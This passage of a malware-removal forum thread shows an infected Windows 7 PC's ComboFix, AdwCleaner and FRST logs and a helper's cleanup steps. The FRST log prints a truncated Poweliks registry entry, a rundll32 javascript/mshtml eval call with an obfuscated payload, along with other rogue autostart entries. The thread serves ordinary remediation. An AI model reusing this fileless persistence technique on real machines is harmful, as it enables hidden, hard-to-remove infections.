2014-11-07 09:43 . 2014-11-07 09:43 62576 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\offreg.dll
2014-11-07 06:50 . 2014-11-07 06:50 114904 ----a-w- c:\windows\system32\drivers\2E8A529B.sys
2014-11-07 04:18 . 2014-09-17 07:35 908840 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{B4775F75-8211-4724-B45F-4A210E549B66}\gapaengine.dll
2014-11-07 04:14 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{663C1E5C-F5CB-4675-B9F2-69A490CE2832}\mpengine.dll
2014-11-05 21:37 . 2014-11-05 21:37 -------- d-----w- c:\programdata\VenqIxjeh
2014-11-05 21:36 . 2014-11-05 21:36 -------- d-----w- c:\programdata\KupoqIkavk
2014-11-05 07:34 . 2014-11-05 15:32 -------- d-----w- c:\users\Jack\AppData\Roaming\Ismyihci
2014-11-05 07:33 . 2014-11-07 06:53 -------- d-----w- c:\programdata\CimhAyoj
2014-11-05 07:33 . 2014-11-07 06:53 -------- d-----w- c:\programdata\LukucOkjav
2014-11-04 04:05 . 2014-11-05 15:32 -------- d-----w- c:\users\Jack\AppData\Roaming\Waanypi
2014-11-04 04:04 . 2014-11-04 04:04 -------- d-----w- c:\programdata\FunhEmnol
2014-11-04 04:03 . 2014-11-04 04:03 -------- d-----w- c:\programdata\ZixvOfbax
2014-11-01 06:16 . 2014-11-02 03:15 -------- d-----w- c:\programdata\MuztOnba
2014-11-01 06:15 . 2014-11-02 03:15 -------- d-----w- c:\programdata\UabcIzedk
2014-11-01 03:45 . 2014-11-01 06:16 -------- d-----w- c:\users\Jack\AppData\Roaming\FrameworkUpdate7
2014-11-01 03:45 . 2014-11-02 06:10 -------- d-----w- C:\b11f30c
2014-10-31 10:26 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll
2014-10-31 02:12 . 2014-10-31 02:12 -------- d-----w- C:\TDSSKiller_Quarantine
2014-10-31 00:31 . 2014-10-31 02:16 -------- d-----w- c:\programdata\Malwarebytes' Anti-Malware (portable)
2014-10-29 13:01 . 2014-10-29 13:01 -------- d-----w- c:\windows\Microsoft Antimalware
2014-10-27 07:04 . 2014-06-27 01:45 2285056 ----a-w- c:\windows\system32\msmpeg2vdec.dll
2014-10-26 23:01 . 2014-10-29 14:02 -------- d-----w- c:\users\Jack\AppData\Roaming\Tyfyukbe
2014-10-26 09:12 . 2014-02-04 02:04 1230336 ----a-w- c:\windows\system32\WindowsCodecs.dll
2014-10-26 09:10 . 2013-11-23 18:26 417792 ----a-w- c:\windows\system32\WMPhoto.dll
2014-10-26 09:08 . 2014-09-19 00:44 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-10-26 09:08 . 2014-06-24 02:59 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-10-26 09:08 . 2013-11-26 08:16 3419136 ----a-w- c:\windows\system32\d2d1.dll
2014-10-25 17:45 . 2014-10-25 17:45 -------- d-sh--w- c:\users\Jack\AppData\Local\EmieUserList
2014-10-25 17:45 . 2014-10-25 17:45 -------- d-sh--w- c:\users\Jack\AppData\Local\EmieSiteList
2014-10-25 16:49 . 2014-10-25 16:49 -------- d-----w- c:\windows\ERUNT
2014-10-25 13:05 . 2014-10-25 13:05 9728 ---ha-w- c:\windows\system32\api-ms-win-downlevel-shlwapi-l1-1-0.dll
2014-10-25 11:54 . 2014-10-25 11:54 17344 ----a-w- c:\windows\system32\drivers\GUBootStartup.sys
2014-10-25 11:53 . 2014-10-25 11:53 -------- d-----w- c:\users\Jack\AppData\Roaming\GlarySoft
2014-10-25 11:53 . 2014-10-25 11:53 -------- d-----w- c:\users\Jack\AppData\Roaming\DiskDefrag
2014-10-25 11:53 . 2014-11-07 03:25 -------- d-----w- c:\program files\Glary Utilities 5
2014-10-15 07:33 . 2014-10-10 01:44 230912 ----a-w- c:\windows\system32\generaltel.dll
2014-10-15 07:33 . 2014-10-10 01:44 396288 ----a-w- c:\windows\system32\aepdu.dll
2014-10-15 07:33 . 2014-10-10 01:39 302592 ----a-w- c:\windows\system32\aeinv.dll
2014-10-15 07:33 . 2014-09-29 00:41 2379264 ----a-w- c:\windows\system32\win32k.sys
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-11-07 06:50 . 2014-04-06 13:16 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-31 00:30 . 2014-04-06 13:13 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-30 11:24 . 2013-11-25 16:49 229000 ------w- c:\windows\system32\MpSigStub.exe
2014-10-01 15:11 . 2014-04-06 13:13 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-01 15:11 . 2013-11-25 17:14 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-09-29 20:13 . 2014-09-29 20:13 31744 ----a-w- c:\windows\system32\drivers\netfilter.sys
2014-09-25 01:40 . 2014-10-01 06:24 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-23 21:40 . 2013-11-26 03:47 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-23 21:40 . 2013-11-26 03:47 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-17 07:35 . 2014-04-08 07:11 908840 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll
2014-09-09 21:47 . 2014-09-23 22:37 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-23 01:46 . 2014-08-27 21:55 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-22 21:10 . 2014-08-22 21:10 21480 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Offline Scanner\FilesList32.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt1"]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt2"]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt3"]
@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt4"]
@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt5"]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt6"]
@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt7"]
@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\"DropboxExt8"]
@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\Jack\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"CCleaner Monitoring"="c:\program files\CCleaner\CCleaner.exe" [2014-10-23 4825880]
"GUDelayStartup"="c:\program files\Glary Utilities 5\StartupManager.exe" [2014-10-13 37152]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2009-09-24 141848]
"Persistence"="c:\windows\system32\igfxpers.exe" [2009-09-24 150552]
"MSC"="c:\program files\Microsoft Security Client\msseces.exe" [2014-08-22 974432]
"SunJavaUpdateSched"="c:\program files\Common Files\Java\Java Update\jusched.exe" [2014-05-07 256896]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 0 (0x0)
"ConsentPromptBehaviorUser"= 0 (0x0)
"EnableLUA"= 0 (0x0)
"EnableUIADesktopToggle"= 0 (0x0)
"EnableVirtualization"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\system\currentcontrolset\control\session manager]
BootExecute REG_MULTI_SZ   autocheck autochk * 
.
[HKLM\~\startupfolder\C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Dropbox.lnk]
path=c:\users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
backup=c:\windows\pss\Dropbox.lnk.Startup
backupExtension=.Startup
.
[HKLM\~\startupfolder\C:^Users^Jack^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^Monitor Ink Alerts - HP Deskjet 1510 series.lnk]
path=c:\users\Jack\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Monitor Ink Alerts - HP Deskjet 1510 series.lnk
backup=c:\windows\pss\Monitor Ink Alerts - HP Deskjet 1510 series.lnk.Startup
backupExtension=.Startup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SpUninstallCleanUp]
REG delete HKEY_LOCAL_MACHINE\Software\SearchProtect [X]
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Adobe ARM]
2014-05-08 13:48 959904 ----a-w- c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HotKeysCmds]
2009-09-24 00:30 173592 ----a-w- c:\windows\System32\hkcmd.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\HP Software Update]
2013-05-30 19:50 96056 ----a-w- c:\program files\HP\HP Software Update\hpwuschd2.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Skgrfuuzzc]
2014-10-31 01:59 272896 ----a-w- c:\users\Jack\AppData\Local\Programs\Skgrfuuzzc.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\SoundMAXPnP]
2009-08-03 21:00 1314816 ----a-w- c:\program files\Analog Devices\Core\smax4pnp.exe
.
R3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-10-25 108032]
R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys [2014-07-17 95920]
R3 NisSrv;Microsoft Network Inspection;c:\program files\Microsoft Security Client\NisSrv.exe [2014-08-22 288120]
S1 GUBootStartup;GUBootStartup;c:\windows\System32\drivers\GUBootStartup.sys [2014-10-25 17344]
S2 HPSupportSolutionsFrameworkService;HP Support Solutions Framework Service;c:\program files\Hp\Common\HPSupportSolutionsFrameworkService.exe [2014-02-05 47416]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - MPKSL4D4A1AF2
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-06-11 02:27 1091912 ----a-w- c:\program files\Google\Chrome\Application\35.0.1916.153\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-11-08 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2013-11-26 21:40]
.
2014-10-25 c:\windows\Tasks\GlaryInitialize 5.job
- c:\program files\Glary Utilities 5\Initialize.exe [2014-10-13 05:32]
.
2014-07-02 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-25 16:54]
.
2014-07-02 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2013-11-25 16:54]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://xfinity.comcast.net/
TCP: DhcpNameServer = 75.75.75.75 75.75.76.76
TCP: Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: NameServer = 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
.
- - - - ORPHANS REMOVED - - - -
.
MSConfigStartUp-BManager - c:\program files\Browser Features\BManager.exe
MSConfigStartUp-Browser Features - c:\program files\Browser Features\BManager.exe
MSConfigStartUp-MSMPENG - c:\users\Jack\AppData\Roaming\svc-umwl.exe
MSConfigStartUp-Windows X64 Service Manager - c:\program files\FlashNow Updater\flsysio.exe
.
.
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-2108881583-117912961-3019965817-1000_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32\*]
@Allowed: (Read) (RestrictedCode)
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe,-101"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\Elevation]
"Enabled"=dword:00000001
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\LocalServer32]
@="c:\\Windows\\system32\\Macromed\\Flash\\FlashUtil32_15_0_0_167_ActiveX.exe"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B019E3BF-E7E5-453C-A2E4-D2C18CA0866F}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}]
@Denied: (A 2) (Everyone)
@="IFlashBroker6"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Interface\{299817DA-1FAC-4CE2-8F48-A108237013BD}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\PCW\Security]
@Denied: (Full) (Everyone)
.
Completion time: 2014-11-08  16:26:46
ComboFix-quarantined-files.txt  2014-11-08 21:26
.
Pre-Run: 703,285,739,520 bytes free
Post-Run: 715,552,100,352 bytes free
.
- - End Of File - - 4FFD38030584CA96EAADD4F066032702
2B04374FE0FC03CCB75040264CDC39BE


#10 deeprybka

  • Malware Response Team

Posted 08 November 2014 - 05:36 PM

Step 1

  • Download EEK and extract the contents to C:\
  • Double-click the desktop-shortcut to start the tool.
  • Click in the following update-screen "Yes" to obtain the latest malware definitions.
  • Once the update is complete click "Scan".
  • Enable "PUPs" detection (1) and click on "Full Scan" (2).
  • If adware/malware was detected, make sure to check all the items and click "Quarantine selected" (1) and afterwards "view report" (2).
  • Please paste the content of the report in your next reply.

Step 2

Please download AdwCleaner (by Xplode) and save it to your Desktop.
  • Double click on AdwCleaner.exe to run the tool.
    Vista/Windows 7/8 users right-click and select "Run As Administrator"
  • Click on the Scan button.
  • After the scan has finished, click on the Clean button.
  • Press OK when asked to close all programs and follow the onscreen prompts.
  • After rebooting, a log file (that is saved in C:\AdwCleaner[S#].txt) will open automatically.
    Copy and paste the contents of that logfile in your next reply.
Step 3


Start FRST with administrator privileges.
  • Make sure the following option is checked: Addition.txt
  • Press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
    Please copy and paste these logs in your next reply.

Edited by deeprybka, 08 November 2014 - 05:38 PM.

regards,
deeprybka
Neminem laede, immo omnes, quantum potes, iuva. Arthur Schopenhauer

#11 Bobbie S.

  • Topic Starter
  • Members

Posted 08 November 2014 - 09:08 PM

I have to attach the log. Apparently there are a lot of what appear to be emoticons in the log.

On to the AdwCleaner.

BTW, Security Essentials keeps finding things. I thought it was off, but something must have turned it back on?

Bobbie


#12 Bobbie S.

  • Topic Starter
  • Members

Posted 08 November 2014 - 09:41 PM

Unable to run AdwCleaner.

It says "waiting for action" after I click the Scan button.

There are a lot of iexplore.exe showing up in TaskManager - all saying the page can't be displayed. But no IE icons show up on the screen, or on the TaskBar.

I'm going to reboot and try AdwCleaner again.

I'm beginning to think this computer needs reformatting - as much as I hate to have to do that.

Bobbie



#13 deeprybka

  • Malware Response Team

Posted 09 November 2014 - 09:54 AM

Unable to run AdwCleaner.
It says "waiting for action" after I click the Scan button.

 
  • After the scan has finished, click on the Clean button.
:)

I'm beginning to think this computer needs reformatting


Relax buddy...Please try to run AdwCleaner...
regards,
deeprybka

#14 Bobbie S.

  • Topic Starter
  • Members

Posted 09 November 2014 - 10:15 AM

It worked this morning.  Here is the AdwCleaner log.
I'll go to the FRST now.
I have the feeling you're like me - hate to reformat when so much is to be learned by getting the cleaning done.
There are still some COM Surrogate showing up in Task Manager, but not all of the iexplore.exe that were there yesterday.
Bobbie
 
 
 
 
# AdwCleaner v4.100 - Report created 09/11/2014 at 10:08:26
# DB v2014-11-07.1
# Updated 08/11/2014 by Xplode
# Operating System : Windows 7 Professional Service Pack 1 (32 bits)
# Username : Jack - JACK-PC
# Running from : C:\Users\Jack\Desktop\AdwCleaner.exe
# Option : Clean
 
***** [ Services ] *****
 
 
***** [ Files / Folders ] *****
 
File Deleted : C:\Windows\system32\drivers\netfilter.sys
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\chrome\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\components\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\defaults\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\locale\user.js
File Deleted : C:\Users\Jack\AppData\Roaming\Mozilla\Firefox\Profiles\skin\user.js
 
***** [ Scheduled Tasks ] *****
 
 
***** [ Shortcuts ] *****
 
 
***** [ Registry ] *****
 
Key Deleted : HKCU\Software\UpdateFiles
Key Deleted : HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GoogleUpdate.exe
 
***** [ Browsers ] *****
 
-\\ Internet Explorer v11.0.9600.17344
 
 
-\\ Mozilla Firefox v
 
 
-\\ Google Chrome v35.0.1916.153
 
 
*************************
 
AdwCleaner[R0].txt - [293 octets] - [08/11/2014 21:12:42]
AdwCleaner[R1].txt - [293 octets] - [08/11/2014 21:19:56]
AdwCleaner[R2].txt - [1510 octets] - [09/11/2014 10:03:47]
AdwCleaner[S0].txt - [1440 octets] - [09/11/2014 10:08:26]
 
########## EOF - C:\AdwCleaner\AdwCleaner[S0].txt - [1500 octets] ##########


#15 Bobbie S.

  • Topic Starter
  • Members

Posted 09 November 2014 - 10:17 AM

Here is the FRST.txt

I'll wait for the "fix" to be sent to me.

Thanks for all your patience.

Bobbie

 

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 09-11-2014
Ran by Jack (administrator) on JACK-PC on 09-11-2014 10:13:48
Running from C:\Users\Jack\Downloads
Loaded Profile: Jack (Available profiles: Jack)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\MsMpEng.exe
(Hewlett-Packard Company) C:\Program Files\HP\Common\HPSupportSolutionsFrameworkService.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Service.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\tv_w32.exe
(TeamViewer GmbH) C:\Program Files\TeamViewer\Version9\TeamViewer_Desktop.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Microsoft Security Client\NisSrv.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [MSC] => c:\Program Files\Microsoft Security Client\msseces.exe [974432 2014-08-22] (Microsoft Corporation)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Program Files\Common Files\Java\Java Update\jusched.exe [256896 2014-05-07] (Oracle Corporation)
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Microsoft\Microsoft Antimalware <====== ATTENTION
HKLM Group Policy restriction on software: C:\Documents and Settings\All Users\Application Data\Malwarebytes <====== ATTENTION
Winlogon\Notify\acillao: C:\Users\Jack\AppData\Local\acillao.dll ()
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4825880 2014-10-23] (Piriform Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [GUDelayStartup] => C:\Program Files\Glary Utilities 5\StartupManager.exe [37152 2014-10-13] (Glarysoft Ltd)
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...\Run: [acillao] => rundll32 "C:\Users\Jack\AppData\Local\acillao.dll",acillao <===== ATTENTION
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
BootExecute: autocheck autochk *  
GroupPolicy: Group Policy on Chrome detected <======= ATTENTION
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://xfinity.comcast.net/
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache_TIMESTAMP = 0xD81BF7C5FEE9CE01
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache AcceptLangs = en-us
HKCU\Software\Microsoft\Internet Explorer\Main,Old Start Page = http://www.yahoo.com/?fr=befhp&type=iehp-3.13-1406
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKU\S-1-5-21-2108881583-117912961-3019965817-1000\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
SearchScopes: HKCU - {4AA1010B-C099-473B-B519-B51807026EBF} URL = http://search.yahoo.com/search?p={searchTerms}&b={startPage?}&fr=ie8
BHO: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{F5CFB83D-4674-45F5-B64D-C75316FE2D3F}: [NameServer] 8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8,8.8.8.8
 
FireFox:
========
FF Plugin: @java.com/DTPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.60.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
 
Chrome: 
=======
CHR Profile: C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-11-08]
CHR Extension: (Google Drive) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-11-08]
CHR Extension: (Google Voice Search Hotword (Beta)) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\bepbmhgboaologfdajaanbcjmnhjmhfn [2014-11-08]
CHR Extension: (YouTube) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-11-08]
CHR Extension: (Google Search) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-11-08]
CHR Extension: (Google Wallet) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-11-08]
CHR Extension: (Gmail) - C:\Users\Jack\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-11-08]
 
========================== Services (Whitelisted) =================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
R2 HPSupportSolutionsFrameworkService; C:\Program Files\Hp\Common\HPSupportSolutionsFrameworkService.exe [47416 2014-02-05] (Hewlett-Packard Company)
R2 MsMpSvc; c:\Program Files\Microsoft Security Client\MsMpEng.exe [22192 2014-08-22] (Microsoft Corporation)
R3 NisSrv; c:\Program Files\Microsoft Security Client\NisSrv.exe [288120 2014-08-22] (Microsoft Corporation)
 
==================== Drivers (Whitelisted) ====================
 
(If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 cleanhlp; C:\EEK\bin\cleanhlp32.sys [50200 2014-11-08] (Emsisoft GmbH)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [17344 2014-10-25] (Glarysoft Ltd)
R0 MpFilter; C:\Windows\System32\DRIVERS\MpFilter.sys [231800 2014-07-17] (Microsoft Corporation)
S3 catchme; \??\C:\Users\Jack\AppData\Local\Temp\catchme.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
 
(If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.)
 
 
==================== One Month Created Files and Folders ========
 
(If an entry is included in the fixlist, the file\folder will be moved.)
 
